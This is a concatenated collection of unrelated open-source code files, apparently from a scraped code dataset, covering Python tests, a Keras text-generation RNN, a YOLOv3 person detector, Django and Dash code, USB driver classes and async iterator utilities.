x_test_sparse[x_test.nonzero()] = x_test[x_test.nonzero()]
mapped_train, mapped_test, feature_index_mapping = self.f.map(x_train_sparse, x_test_sparse)
self.assertEqual(int, type(feature_index_mapping[0]))
self.assertEqual([1, 2, 3], feature_index_mapping)
self.assertTrue(mapped_train.sum(axis=0).all(),
"Every column should have at least one non-zero value.")
x_train_expected = np.zeros((x_train_sparse.shape[0], len(feature_index_mapping)), dtype=np.uint8)
x_train_expected[0, 1] = 1
x_train_expected[0, 2] = 1
x_train_expected[1, 0] = 2
self.assertTrue(np.array_equal(x_train_expected, mapped_train), mapped_train)
x_test_expected = np.zeros((x_test_sparse.shape[0], len(feature_index_mapping)), dtype=np.uint8)
x_test_expected[0, 1] = 1
x_test_expected[1, 1] = 3
self.assertTrue(np.array_equal(x_test_expected, mapped_test), mapped_test)
|
pyNastran/dev/bdf_vectorized/test/all_tests.py
|
ACea15/pyNastran
| 293 |
103387
|
from pyNastran.dev.bdf_vectorized.test.test_coords import *
from pyNastran.dev.bdf_vectorized.test.test_mass import *
from pyNastran.dev.bdf_vectorized.cards.elements.solid.test_solids import *
from pyNastran.dev.bdf_vectorized.cards.elements.shell.test_shell import *
from pyNastran.dev.bdf_vectorized.cards.elements.rod.test_rods import *
#from pyNastran.dev.bdf_vectorized.cards.elements.bar.test_bars import *
#from pyNastran.dev.bdf_vectorized.cards.elements.beam.test_beams import *
#from pyNastran.dev.bdf_vectorized.cards.elements.spring.test_spring import *
#from pyNastran.dev.bdf_vectorized.cards.elements.shear.test_shear import *
#from pyNastran.dev.bdf_vectorized.cards.elements.damper.test_dampers import *
if __name__ == "__main__": # pragma: no cover
import unittest
unittest.main()
|
tests/bytecode/mp-tests/fun2.py
|
LabAixBidouille/micropython
| 303 |
103404
|
def f(*, b):
return b
def f(a, *, b):
return a + b
def f(a, *, b, c):
return a + b + c
def f(a, *, b=c):
return a + b
def f(a, *, b=c, c):
return a + b + c
def f(a, *, b=c, c=d):
return a + b + c
def f(a, *, b=c, c, d=e):
return a + b + c + d
def f(a=None, *, b=None):
return a + b
|
Chapter06/alice_chargen_rnn.py
|
Diponly/Deep-Learning-with-Keras
| 1,119 |
103412
|
# -*- coding: utf-8 -*-
# Adapted from lstm_text_generation.py in keras/examples
from __future__ import print_function
from keras.layers.recurrent import SimpleRNN
from keras.models import Sequential
from keras.layers import Dense, Activation
import numpy as np
INPUT_FILE = "../data/alice_in_wonderland.txt"
# extract the input as a stream of characters
print("Extracting text from input...")
fin = open(INPUT_FILE, 'rb')
lines = []
for line in fin:
line = line.strip().lower()
line = line.decode("ascii", "ignore")
if len(line) == 0:
continue
lines.append(line)
fin.close()
text = " ".join(lines)
# creating lookup tables
# Here chars is our character "vocabulary"; nb_chars (its size) is the number of features
chars = set([c for c in text])
nb_chars = len(chars)
char2index = dict((c, i) for i, c in enumerate(chars))
index2char = dict((i, c) for i, c in enumerate(chars))
# create inputs and labels from the text. We do this by stepping
# through the text ${step} character at a time, and extracting a
# sequence of size ${seqlen} and the next output char. For example,
# assuming an input text "The sky was falling", we would get the
# following sequence of input_chars and label_chars (first 5 only)
# The sky wa -> s
# he sky was ->
# e sky was -> f
# sky was f -> a
# sky was fa -> l
print("Creating input and label text...")
SEQLEN = 10
STEP = 1
input_chars = []
label_chars = []
for i in range(0, len(text) - SEQLEN, STEP):
input_chars.append(text[i:i + SEQLEN])
label_chars.append(text[i + SEQLEN])
# vectorize the input and label chars
# Each row of the input is represented by seqlen characters, each
# represented as a 1-hot encoding of size len(char). There are
# len(input_chars) such rows, so shape(X) is (len(input_chars),
# seqlen, nb_chars).
# Each row of output is a single character, also represented as a
# dense encoding of size len(char). Hence shape(y) is (len(input_chars),
# nb_chars).
print("Vectorizing input and label text...")
X = np.zeros((len(input_chars), SEQLEN, nb_chars), dtype=bool)
y = np.zeros((len(input_chars), nb_chars), dtype=bool)
for i, input_char in enumerate(input_chars):
for j, ch in enumerate(input_char):
X[i, j, char2index[ch]] = 1
y[i, char2index[label_chars[i]]] = 1
# Build the model. We use a single RNN with a fully connected layer
# to compute the most likely predicted output char
HIDDEN_SIZE = 128
BATCH_SIZE = 128
NUM_ITERATIONS = 25
NUM_EPOCHS_PER_ITERATION = 1
NUM_PREDS_PER_EPOCH = 100
model = Sequential()
model.add(SimpleRNN(HIDDEN_SIZE, return_sequences=False,
input_shape=(SEQLEN, nb_chars),
unroll=True))
model.add(Dense(nb_chars))
model.add(Activation("softmax"))
model.compile(loss="categorical_crossentropy", optimizer="rmsprop")
# We train the model in batches and test output generated at each step
for iteration in range(NUM_ITERATIONS):
print("=" * 50)
print("Iteration #: %d" % (iteration))
model.fit(X, y, batch_size=BATCH_SIZE, epochs=NUM_EPOCHS_PER_ITERATION)
# testing model
# randomly choose a row from input_chars, then use it to
# generate text from model for next 100 chars
test_idx = np.random.randint(len(input_chars))
test_chars = input_chars[test_idx]
print("Generating from seed: %s" % (test_chars))
print(test_chars, end="")
for i in range(NUM_PREDS_PER_EPOCH):
Xtest = np.zeros((1, SEQLEN, nb_chars))
for i, ch in enumerate(test_chars):
Xtest[0, i, char2index[ch]] = 1
pred = model.predict(Xtest, verbose=0)[0]
ypred = index2char[np.argmax(pred)]
print(ypred, end="")
# move forward with test_chars + ypred
test_chars = test_chars[1:] + ypred
print()
|
setup.py
|
adafruit/adafruit-beaglebone-io-python
| 305 |
103450
|
try:
from overlays import builder
builder.compile()
builder.copy()
except:
pass
import distribute_setup
import io
import sys
import platform
distribute_setup.use_setuptools()
from setuptools import setup, Extension, find_packages
open_as_utf8 = lambda x: io.open(x, encoding='utf-8')
kernel = platform.release()
if kernel >= '4.1.0':
kernel41 = [('BBBVERSION41', None)]
else:
kernel41 = None
CFLAGS = ['-Wall']
classifiers = ['Development Status :: 3 - Alpha',
'Operating System :: POSIX :: Linux',
'License :: OSI Approved :: MIT License',
'Intended Audience :: Developers',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Topic :: Software Development',
'Topic :: Home Automation',
'Topic :: System :: Hardware']
extension_args = {
'include_dirs': ['source/include/'],
'extra_compile_args': CFLAGS,
'define_macros': kernel41
}
setup(name = 'Adafruit_BBIO',
version = '1.2.0',
author = '<NAME>',
author_email = '<EMAIL>',
description = 'A module to control BeagleBone IO channels',
long_description = open_as_utf8('README.md').read() + open_as_utf8('CHANGELOG.md').read(),
long_description_content_type = 'text/markdown',
license = 'MIT',
keywords = 'Adafruit BeagleBone IO GPIO PWM ADC',
url = 'https://github.com/adafruit/adafruit-beaglebone-io-python/',
classifiers = classifiers,
packages = find_packages(),
py_modules = ['Adafruit_I2C'],
ext_modules = [Extension('Adafruit_BBIO.GPIO', ['source/py_gpio.c', 'source/event_gpio.c', 'source/c_pinmux.c', 'source/constants.c', 'source/common.c'], **extension_args),
Extension('Adafruit_BBIO.PWM', ['source/py_pwm.c', 'source/c_pwm.c', 'source/c_pinmux.c', 'source/constants.c', 'source/common.c'], **extension_args),
Extension('Adafruit_BBIO.ADC', ['source/py_adc.c', 'source/c_adc.c', 'source/constants.c', 'source/common.c'], **extension_args),
Extension('Adafruit_BBIO.SPI', ['source/spimodule.c', 'source/c_pinmux.c', 'source/constants.c', 'source/common.c'], **extension_args),
Extension('Adafruit_BBIO.UART', ['source/py_uart.c', 'source/c_pinmux.c', 'source/c_uart.c', 'source/constants.c', 'source/common.c'], **extension_args)] )
|
thirdparty/his_evaluators/his_evaluators/metrics/yolov3/human_detector.py
|
eyaler/impersonator
| 1,717 |
103467
|
import torch
import torch.nn as nn
import os
from .models import Darknet
from .utils.utils import non_max_suppression, rescale_boxes
class YoLov3HumanDetector(nn.Module):
def __init__(self, weights_path="weights/yolov3.weights",
conf_thres=0.8, nms_thres=0.4, img_size=416, device=torch.device("cpu")):
super().__init__()
self.conf_thres = conf_thres
self.nms_thres = nms_thres
self.img_size = img_size
# Set up model
model_def = os.path.abspath(os.path.dirname(__file__))
# model_def = os.path.join(model_def, "config", "yolov3.cfg")
model_def = os.path.join(model_def, "config", "yolov3-spp.cfg")
model = Darknet(model_def, img_size=img_size).to(device)
if weights_path.endswith(".weights"):
# Load darknet weights
model.load_darknet_weights(weights_path)
else:
# Load checkpoint weights
model.load_state_dict(torch.load(weights_path))
model.eval()
self.device = device
self.model = model.to(device)
def forward(self, input_imgs, input_shapes, factor=1.05):
"""
        Run YOLOv3 on input_imgs and return the largest person bounding box for each image in input_imgs.
Args:
input_imgs (torch.tensor): (bs, 3, height, width) is in the range of [0, 1],
input_shapes (list[tuple]): [(height, width), (height, width), ...],
factor (float): the factor to enlarge the original boxes, e.g [x0, y0, x1, y1] -> [xx0, yy0, xx1, yy1],
here (xx1 - xx0) / (x1 - x0) = factor and (yy1 - yy0) / (y1 - y0) = factor.
Returns:
boxes_list (list[tuple or None]): (x1, y1, x2, y2) or None
"""
# Get detections
with torch.no_grad():
# img, _ = pad_to_square(input_imgs, 0)
# Resize
img_detections = self.model(input_imgs)
img_detections = non_max_suppression(img_detections, self.conf_thres, self.nms_thres)
bs = len(img_detections)
boxes_list = [None for _ in range(bs)]
        # Select the largest person box for each image in the batch
for i, (detections, img_shape) in enumerate(zip(img_detections, input_shapes)):
if detections is not None:
# Rescale boxes to original image
detections = rescale_boxes(detections, self.img_size, img_shape)
max_area = 0
boxes = None
for x1, y1, x2, y2, conf, cls_conf, cls_pred in detections:
                    # keep only detections of the person class (COCO class id 0)
if int(cls_pred) != 0:
continue
box_w = x2 - x1
box_h = y2 - y1
area = box_h * box_w
if area > max_area:
max_area = area
boxes = (x1, y1, x2, y2)
if boxes is not None:
boxes_list[i] = self.enlarge_boxes(boxes, img_shape, factor=factor)
return boxes_list
@staticmethod
def enlarge_boxes(boxes, orig_shape, factor=1.0):
"""
Args:
boxes (list or tuple): (x0, y0, x1, y1),
orig_shape (tuple or list): (height, width),
factor (float): the factor to enlarge the original boxes, e.g [x0, y0, x1, y1] -> [xx0, yy0, xx1, yy1],
here (xx1 - xx0) / (x1 - x0) = factor and (yy1 - yy0) / (y1 - y0) = factor.
Returns:
new_boxes (list of tuple): (xx0, yy0, xx1, yy1),
here (xx1 - xx0) / (x1 - x0) = factor and (yy1 - yy0) / (y1 - y0) = factor.
"""
height, width = orig_shape
x0, y0, x1, y1 = boxes
w = x1 - x0
h = y1 - y0
cx = (x1 + x0) / 2
cy = (y1 + y0) / 2
half_new_w = w * factor / 2
half_new_h = h * factor / 2
xx0 = int(max(0, cx - half_new_w))
yy0 = int(max(0, cy - half_new_h))
xx1 = int(min(width, cx + half_new_w))
yy1 = int(min(height, cy + half_new_h))
new_boxes = (xx0, yy0, xx1, yy1)
return new_boxes
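

# --- Illustrative usage sketch (not part of the original module) ---
# A minimal sketch of how the detector above might be driven. The weights path,
# the random image tensors and the original shapes are placeholders; real
# YOLOv3-SPP weights have to be downloaded separately for this to work.
if __name__ == "__main__":
    device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
    detector = YoLov3HumanDetector(weights_path="weights/yolov3-spp.weights",
                                   conf_thres=0.8, nms_thres=0.4,
                                   img_size=416, device=device)
    # Fake batch of two RGB images, already padded/resized to img_size and
    # scaled to [0, 1], which is what forward() expects.
    imgs = torch.rand(2, 3, 416, 416, device=device)
    # Original (pre-resize) (height, width) pairs used to rescale boxes back.
    shapes = [(720, 1280), (480, 640)]
    boxes = detector(imgs, shapes, factor=1.05)
    print(boxes)  # e.g. [(x1, y1, x2, y2), None]; None when no person is found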
|
python/django/python-hello-world/src/helloapp/views.py
|
davidponder/cloud-code-samples
| 319 |
103514
|
<gh_stars>100-1000
from django.shortcuts import render
import os
def homePageView(request):
return render(request, 'homepage.html', context={
"message": "It's running!"
})
|
dash_docs/chapters/dash_vtk/click_hover/index.py
|
wesleyacheng/dash-docs
| 379 |
103544
|
import dash_html_components as html
import dash_vtk
from dash_docs import tools
from dash_docs import styles
from dash_docs import reusable_components as rc
examples = tools.load_examples(__file__)
layout = html.Div([
rc.Markdown('''
# Click and Hover Callbacks
It's possible to create callbacks based on user clicks and hovering. First, you need to specify the `pickingModes` prop in
`dash_vtk.View` to be a list of modes you want to capture. The following values are accepted:
* `"click"`
* `"hover"`
Afterwards, you need to create callbacks where the inputs and states include one of the following read-only properties of `dash_vtk.View`.
* `clickInfo`: Called when the user clicks on an object.
* `hoverInfo`: Called when the user hovers over an object.
> The full documentation for `dash_vtk.View` can be found in the [API reference](/vtk/reference).
## Callback structure
    The `clickInfo` or `hoverInfo` data is a dictionary with various keys describing the picked object. The keys include:
    * `displayPosition`: The x, y, z coordinate of the click or hover on the user's screen.
    * `ray`: A line between two points in 3D space (xyz1, xyz2) that represents the mouse position. It covers the full space under the 2D mouse position.
* `representationId`: The ID assigned to the `dash_vtk.GeometryRepresentation` containing your object.
* `worldPosition`: The x, y, z coordinates in the 3D environment that you are rendering where the ray hit the object. It corresponds to the 3D coordinate on the surface of the object under your mouse.
'''),
rc.Markdown('''
## Output `clickInfo` to `html.Pre`
The following example shows you how to concisely display the output of `clickInfo` inside an `html.Pre`:
'''),
html.Details(open=False, children=[
html.Summary('View full code'),
rc.Markdown(
examples['t07_click_info.py'][0],
style=styles.code_container
),
]),
html.Div(
examples['t07_click_info.py'][1],
className='example-container'
),
rc.Markdown('''
## Update representation state with `hoverInfo`
You can also construct more complex hover callbacks, which would affect the `actor` and `state` of your geometry representations.
In the [terrain mesh demo](https://dash-gallery.plotly.host/dash-vtk-explorer/pyvista-terrain-following-mesh), whenever you hover
over the surface, a callback is fired and the output is displayed on your screen:

The full code can be found [here](https://github.com/plotly/dash-vtk/tree/master/demos/pyvista-terrain-following-mesh), but the
following snippet summarizes what is needed to capture hover events in the image above:
```py
# ...
vtk_view = dash_vtk.View(
id="vtk-view",
pickingModes=["hover"],
children=[
dash_vtk.GeometryRepresentation(id="vtk-representation", ...),
dash_vtk.GeometryRepresentation(
id="pick-rep",
children=[
dash_vtk.Algorithm(id="pick-sphere", ...)
],
# ...
),
],
)
app.layout = html.Div([
# ...,
vtk_view,
# ...
])
@app.callback(
[
Output("tooltip", "children"),
Output("pick-sphere", "state"),
Output("pick-rep", "actor"),
],
[Input("vtk-view", "clickInfo"), Input("vtk-view", "hoverInfo")],
)
def onInfo(clickData, hoverData):
info = hoverData if hoverData else clickData
if info:
if (
"representationId" in info
and info["representationId"] == "vtk-representation"
):
return (
[json.dumps(info, indent=2)],
{"center": info["worldPosition"]},
{"visibility": True},
)
return dash.no_update, dash.no_update, dash.no_update
return [""], {}, {"visibility": False}
```
You can also use `hoverInfo` to update the state of another geometry representation. The image below shows how to update a cone position, orientation and size in order to probe the race car object:

Learn more by reading the [source code](https://github.com/plotly/dash-sample-apps/tree/master/apps/dash-vehicle-geometry) or trying out the [Vehicle Geometry app](https://dash-gallery.plotly.host/dash-vehicle-geometry/).
'''),
])
|
nikola/packages/tzlocal/__init__.py
|
asmeurer/nikola
| 1,901 |
103547
|
<filename>nikola/packages/tzlocal/__init__.py<gh_stars>1000+
"""Try to figure out what your local timezone is."""
import sys
__version__ = "2.0.0-nikola"
if sys.platform == "win32":
from .win32 import get_localzone, reload_localzone # NOQA
else:
from .unix import get_localzone, reload_localzone # NOQA
|
parsifal/apps/activities/models.py
|
ShivamPytho/parsifal
| 342 |
103560
|
<filename>parsifal/apps/activities/models.py
from django.contrib.auth.models import User
from django.db import models
from django.utils.translation import gettext_lazy as _
from parsifal.apps.activities.constants import ActivityTypes
from parsifal.apps.reviews.models import Review
class Activity(models.Model):
from_user = models.ForeignKey(User, on_delete=models.CASCADE, verbose_name=_("from user"))
to_user = models.ForeignKey(User, on_delete=models.CASCADE, related_name="+", null=True, verbose_name=_("to user"))
activity_type = models.CharField(_("type"), max_length=1, choices=ActivityTypes.CHOICES)
content = models.CharField(_("content"), max_length=500, blank=True)
review = models.ForeignKey(Review, on_delete=models.CASCADE, null=True, verbose_name=_("review"))
date = models.DateTimeField(_("date"), auto_now_add=True)
class Meta:
verbose_name = _("activity")
verbose_name_plural = _("activities")
def __str__(self):
return self.get_activity_type_display()
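

# Illustrative sketch (not part of the original module): how an activity row
# might be created from a view. The ActivityTypes.FOLLOW constant name below is
# a hypothetical placeholder -- check parsifal.apps.activities.constants for
# the real choices.
#
#   Activity.objects.create(
#       from_user=request.user,
#       to_user=profile_user,
#       activity_type=ActivityTypes.FOLLOW,  # hypothetical constant name
#   )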
|
matchzoo/datasets/wiki_qa/__init__.py
|
ChrisRBXiong/MatchZoo-py
| 2,209 |
103580
|
<gh_stars>1000+
from .load_data import load_data
|
pmca/usb/driver/__init__.py
|
kubawolanin/Sony-PMCA-RE
| 1,313 |
103605
|
<reponame>kubawolanin/Sony-PMCA-RE<gh_stars>1000+
import abc
from collections import namedtuple
from ...util import *
USB_CLASS_PTP = 6
USB_CLASS_MSC = 8
USB_CLASS_VENDOR_SPECIFIC = 255
UsbDeviceHandle = namedtuple('UsbDeviceHandle', 'handle, idVendor, idProduct')
MSC_SENSE_OK = (0, 0, 0)
MSC_SENSE_ERROR_UNKNOWN = (0x2, 0xff, 0xff)
def parseMscSense(buffer):
return parse8(buffer[2:3]) & 0xf, parse8(buffer[12:13]), parse8(buffer[13:14])
class BaseUsbDriver(object):
def reset(self):
pass
class BaseMscDriver(BaseUsbDriver, abc.ABC):
@abc.abstractmethod
def sendCommand(self, command):
pass
@abc.abstractmethod
def sendWriteCommand(self, command, data):
pass
@abc.abstractmethod
def sendReadCommand(self, command, size):
pass
class BaseMtpDriver(BaseUsbDriver, abc.ABC):
@abc.abstractmethod
def sendCommand(self, code, args):
pass
@abc.abstractmethod
def sendWriteCommand(self, code, args, data):
pass
@abc.abstractmethod
def sendReadCommand(self, code, args):
pass
class BaseUsbContext(abc.ABC):
def __init__(self, name, classType):
self.name = name
self.classType = classType
def __enter__(self):
return self
def __exit__(self, *ex):
pass
@abc.abstractmethod
def listDevices(self, vendor):
pass
@abc.abstractmethod
def openDevice(self, device):
pass
|
monitoring/parse-html.py
|
2xsys/debian-server-tools
| 418 |
103627
|
#!/usr/bin/env python3
#
# Display download URL of a Firefox addon for Windows.
#
# Usage: ./parse-html.py adblock-plus
import sys
import urllib.request
from bs4 import BeautifulSoup
firefox_addon = 'https://addons.mozilla.org'
en_us_addons = firefox_addon + '/en-US/firefox/addon/'
page = urllib.request.urlopen(en_us_addons + sys.argv[1])
html = page.read()
soup = BeautifulSoup(html)
div = soup.find('p', attrs={'class' : 'install-button'})
print(firefox_addon + div.find('a', attrs={'class' : 'windows'})['href'])
|
web/public/python/static/defaultPython.py
|
zonglu666/teaching-open
| 119 |
103632
|
<reponame>zonglu666/teaching-open
import turtle
t = turtle.Turtle()
t.forward(100)
print ("Teaching Python Editor")
|
utils/xyz2obj.py
|
hengkaiz/Pixel2MeshPlusPlus
| 260 |
103640
|
# Copyright (C) 2019 <NAME>, <NAME>, <NAME>, <NAME>
# All rights reserved.
# This code is licensed under BSD 3-Clause License.
import sys
import os
import numpy as np
if __name__ == '__main__':
xyz_list_path = sys.argv[1]
xyzs = [xyz for xyz in os.listdir(xyz_list_path) if xyz.endswith('_predict_3.xyz')]
v = np.full([2466, 1], 'v')
for xyz in xyzs:
print(xyz)
obj_path = xyz.replace('.xyz', '.obj')
xyzf = np.loadtxt(os.path.join(xyz_list_path, xyz))
face = np.loadtxt('/home/wc/workspace/P2MPP/data/face3.obj', dtype='|S32')
out = np.vstack((np.hstack((v, xyzf)), face))
np.savetxt(os.path.join(xyz_list_path, obj_path), out, fmt='%s', delimiter=' ')
|
dojo/engagement/urls.py
|
axelpavageau/django-DefectDojo
| 1,772 |
103645
|
from django.conf.urls import url
from dojo.engagement import views
urlpatterns = [
# engagements and calendar
url(r'^calendar$', views.engagement_calendar, name='calendar'),
url(r'^calendar/engagements$', views.engagement_calendar, name='engagement_calendar'),
url(r'^engagement$', views.engagement, name='engagement'),
url(r'^engagements_all$', views.engagements_all, name='engagements_all'),
url(r'^engagement/(?P<eid>\d+)$', views.view_engagement,
name='view_engagement'),
url(r'^engagement/(?P<eid>\d+)/ics$', views.engagement_ics,
name='engagement_ics'),
url(r'^engagement/(?P<eid>\d+)/edit$', views.edit_engagement,
name='edit_engagement'),
url(r'^engagement/(?P<eid>\d+)/delete$', views.delete_engagement,
name='delete_engagement'),
url(r'^engagement/(?P<eid>\d+)/add_tests$', views.add_tests,
name='add_tests'),
url(r'^engagement/(?P<eid>\d+)/import_scan_results$',
views.import_scan_results, name='import_scan_results'),
url(r'^engagement/(?P<eid>\d+)/close$', views.close_eng,
name='close_engagement'),
url(r'^engagement/(?P<eid>\d+)/reopen$', views.reopen_eng,
name='reopen_engagement'),
url(r'^engagement/(?P<eid>\d+)/complete_checklist$',
views.complete_checklist, name='complete_checklist'),
url(r'^engagement/(?P<eid>\d+)/risk_acceptance/add$',
views.add_risk_acceptance, name='add_risk_acceptance'),
url(r'^engagement/(?P<eid>\d+)/risk_acceptance/add/(?P<fid>\d+)$',
views.add_risk_acceptance, name='add_risk_acceptance'),
url(r'^engagement/(?P<eid>\d+)/risk_acceptance/(?P<raid>\d+)$',
views.view_risk_acceptance, name='view_risk_acceptance'),
url(r'^engagement/(?P<eid>\d+)/risk_acceptance/(?P<raid>\d+)/edit$',
views.edit_risk_acceptance, name='edit_risk_acceptance'),
url(r'^engagement/(?P<eid>\d+)/risk_acceptance/(?P<raid>\d+)/expire$',
views.expire_risk_acceptance, name='expire_risk_acceptance'),
url(r'^engagement/(?P<eid>\d+)/risk_acceptance/(?P<raid>\d+)/reinstate$',
views.reinstate_risk_acceptance, name='reinstate_risk_acceptance'),
url(r'^engagement/(?P<eid>\d+)/risk_acceptance/(?P<raid>\d+)/delete$',
views.delete_risk_acceptance, name='delete_risk_acceptance'),
url(r'^engagement/(?P<eid>\d+)/risk_acceptance/(?P<raid>\d+)/download$',
views.download_risk_acceptance, name='download_risk_acceptance'),
url(r'^engagement/(?P<eid>\d+)/threatmodel$', views.view_threatmodel,
name='view_threatmodel'),
url(r'^engagement/(?P<eid>\d+)/threatmodel/upload$',
views.upload_threatmodel, name='upload_threatmodel'),
]
|
runners/builder.py
|
zhangzhengde0225/SwinTrack
| 143 |
103672
|
from core.run.event_dispatcher.register import EventRegister
def build_runner(model, runner_config, data_source_context, config, event_register: EventRegister):
if runner_config['type'] == 'default':
from .training.default.builder import build_default_training_runner
return build_default_training_runner(model, runner_config, data_source_context, config, event_register)
elif runner_config['type'] == 'default_evaluation' or runner_config['type'] == 'coarse_to_fine_evaluation':
from .evaluation.default import DefaultSiamFCEvaluator
return DefaultSiamFCEvaluator()
else:
raise NotImplementedError(runner_config['type'])
|
tests/patterns/test_UnaryOpPattern.py
|
josiah-wolf-oberholtzer/supriya
| 191 |
103688
|
<filename>tests/patterns/test_UnaryOpPattern.py
import pytest
from supriya.patterns import SequencePattern, UnaryOpPattern
from supriya.patterns.testutils import run_pattern_test
@pytest.mark.parametrize(
"stop_at, operator, input_, expected, is_infinite",
[
(None, "-", 1, [-1], True),
(None, "-", [1], [(-1,)], True),
(None, "-", [[1]], [((-1,),)], True),
(None, "-", [[[1]]], [(((-1,),),)], True),
(None, "-", [1, 2], [(-1, -2)], True),
(None, "-", SequencePattern([1, 2, 3]), [-1, -2, -3], False),
(None, "-", SequencePattern([1, 2, 3], None), [-1, -2, -3], True),
],
)
def test(stop_at, operator, input_, expected, is_infinite):
pattern = UnaryOpPattern(operator, input_)
run_pattern_test(pattern, expected, is_infinite, stop_at)
|
monitoring/grafana/setup.py
|
tsehori/grr
| 4,238 |
103698
|
import setuptools
setup_args = dict(
name="grr-grafanalib-dashboards",
description="GRR grafanalib Monitoring Dashboards",
license="Apache License, Version 2.0",
url="https://github.com/google/grr/tree/master/monitoring/grafana",
maintainer="GRR Development Team",
maintainer_email="<EMAIL>",
packages=setuptools.find_packages(),
install_requires=[
# It is mentioned in grafanalib docs that "We'll probably
# make changes that break backwards compatibility, although
# we'll try hard not to", so we stick with version 0.5.7.
"grafanalib==0.5.7",
],
)
setuptools.setup(**setup_args)
|
drl_grasping/envs/models/primitives/__init__.py
|
Tiamat-Tech/drl_grasping
| 126 |
103702
|
from .box import Box
from .cylinder import Cylinder
from .sphere import Sphere
from .random_primitive import RandomPrimitive
from .plane import Plane
|
aiomisc/iterator_wrapper.py
|
Alviner/aiomisc
| 232 |
103723
|
<reponame>Alviner/aiomisc
import asyncio
import inspect
import threading
from collections import deque
from concurrent.futures import Executor
from types import TracebackType
from typing import (
Any, AsyncIterator, Awaitable, Callable, Deque, Generator, NoReturn,
Optional, Type, TypeVar,
)
from weakref import finalize
from aiomisc.counters import Statistic
T = TypeVar("T")
R = TypeVar("R")
GenType = Generator[T, R, None]
FuncType = Callable[[], GenType]
class ChannelClosed(RuntimeError):
pass
class FromThreadChannel:
def __init__(self, maxsize: int, loop: asyncio.AbstractEventLoop):
self.loop = loop
self.maxsize: int = maxsize
self.queue: Deque[Any] = deque()
self.__close_event = threading.Event()
self.__write_condition = threading.Condition()
self.__read_condition = asyncio.Condition()
def __notify_readers(self) -> None:
def notify() -> None:
async def notify_all() -> None:
async with self.__read_condition:
self.__read_condition.notify_all()
self.loop.create_task(notify_all())
self.loop.call_soon_threadsafe(notify)
def __notify_writers(self) -> None:
with self.__write_condition:
self.__write_condition.notify_all()
def close(self) -> None:
if self.is_closed:
return
self.__close_event.set()
self.__notify_readers()
self.__notify_writers()
@property
def is_overflow(self) -> bool:
if self.maxsize > 0:
return len(self.queue) >= self.maxsize
return False
@property
def is_empty(self) -> bool:
return len(self.queue) == 0
@property
def is_closed(self) -> bool:
return self.__close_event.is_set()
def __enter__(self) -> "FromThreadChannel":
return self
def __exit__(
self, exc_type: Type[Exception],
exc_val: Exception, exc_tb: TracebackType,
) -> None:
self.close()
def put(self, item: Any) -> None:
def predicate() -> bool:
return self.is_closed or not self.is_overflow
with self.__write_condition:
self.__write_condition.wait_for(predicate)
if self.is_closed:
raise ChannelClosed
self.queue.append(item)
self.__notify_readers()
async def get(self) -> Any:
def predicate() -> bool:
return self.is_closed or not self.is_empty
async with self.__read_condition:
await self.__read_condition.wait_for(predicate)
if self.is_closed and self.is_empty:
raise ChannelClosed
try:
return self.queue.popleft()
finally:
self.__notify_writers()
class IteratorWrapperStatistic(Statistic):
started: int
queue_size: int
queue_length: int
yielded: int
enqueued: int
class IteratorWrapper(AsyncIterator):
__slots__ = (
"__channel",
"__close_event",
"__gen_func",
"__gen_task",
"_statistic",
"executor",
"loop",
)
def __init__(
self, gen_func: FuncType, loop: asyncio.AbstractEventLoop = None,
max_size: int = 0, executor: Executor = None,
statistic_name: Optional[str] = None,
):
current_loop = loop or asyncio.get_event_loop()
self.loop: asyncio.AbstractEventLoop = current_loop
self.executor = executor
self.__close_event = asyncio.Event()
self.__channel: FromThreadChannel = FromThreadChannel(
maxsize=max_size, loop=self.loop,
)
self.__gen_task: Optional[asyncio.Task] = None
self.__gen_func: Callable = gen_func
self._statistic = IteratorWrapperStatistic(statistic_name)
self._statistic.queue_size = max_size
@property
def closed(self) -> bool:
return self.__channel.is_closed
@staticmethod
def __throw(_: Any) -> NoReturn:
pass
def _in_thread(self) -> None:
self._statistic.started += 1
with self.__channel:
try:
gen = iter(self.__gen_func())
throw = self.__throw
if inspect.isgenerator(gen):
throw = gen.throw # type: ignore
while not self.closed:
item = next(gen)
try:
self.__channel.put((item, False))
except Exception as e:
throw(e)
self.__channel.close()
break
finally:
del item
self._statistic.enqueued += 1
except StopIteration:
return
except Exception as e:
if self.closed:
return
self.__channel.put((e, True))
finally:
self._statistic.started -= 1
self.loop.call_soon_threadsafe(self.__close_event.set)
async def _run(self) -> Any:
return await self.loop.run_in_executor(
self.executor, self._in_thread,
)
def close(self) -> Awaitable[None]:
self.__channel.close()
if self.__gen_task is not None and not self.__gen_task.done():
self.__gen_task.cancel()
return asyncio.ensure_future(self.wait_closed())
async def wait_closed(self) -> None:
await self.__close_event.wait()
if self.__gen_task:
await asyncio.gather(self.__gen_task, return_exceptions=True)
def __aiter__(self) -> AsyncIterator[Any]:
if self.__gen_task is None:
self.__gen_task = self.loop.create_task(self._run())
return IteratorProxy(self, self.close)
async def __anext__(self) -> Awaitable[T]:
try:
item, is_exc = await self.__channel.get()
except ChannelClosed:
await self.wait_closed()
raise StopAsyncIteration
if is_exc:
await self.close()
raise item from item
self._statistic.yielded += 1
return item
async def __aenter__(self) -> "IteratorWrapper":
return self
async def __aexit__(
self, exc_type: Any, exc_val: Any,
exc_tb: Any,
) -> None:
if self.closed:
return
await self.close()
class IteratorProxy(AsyncIterator):
def __init__(
self, iterator: AsyncIterator,
finalizer: Callable[[], Any],
):
self.__iterator = iterator
finalize(self, finalizer)
def __anext__(self) -> Awaitable[Any]:
return self.__iterator.__anext__()
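

# --- Illustrative usage sketch (not part of the original module) ---
# A minimal sketch of driving IteratorWrapper directly: a blocking generator is
# run in the default thread-pool executor and consumed with ``async for``. The
# generator below is a placeholder; in real code this class is normally reached
# through aiomisc's higher-level helpers.
if __name__ == "__main__":
    import time

    def blocking_numbers():
        for i in range(5):
            time.sleep(0.01)  # stands in for blocking I/O
            yield i

    async def main() -> None:
        wrapper = IteratorWrapper(blocking_numbers, max_size=2)
        async with wrapper:
            async for item in wrapper:
                print(item)

    asyncio.run(main())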
|
tests/grammars/CustomSubclassGenerator.py
|
38b394ce01/grammarinator
| 228 |
103737
|
# Copyright (c) 2017-2020 <NAME>, <NAME>.
#
# Licensed under the BSD 3-Clause License
# <LICENSE.rst or https://opensource.org/licenses/BSD-3-Clause>.
# This file may not be copied, modified, or distributed except
# according to those terms.
# This custom unparser is used by Custom.g4
from grammarinator.runtime import *
from CustomGenerator import CustomGenerator
class CustomSubclassGenerator(CustomGenerator):
def tagname(self, parent=None):
current = UnparserRule(name='tagname', parent=parent)
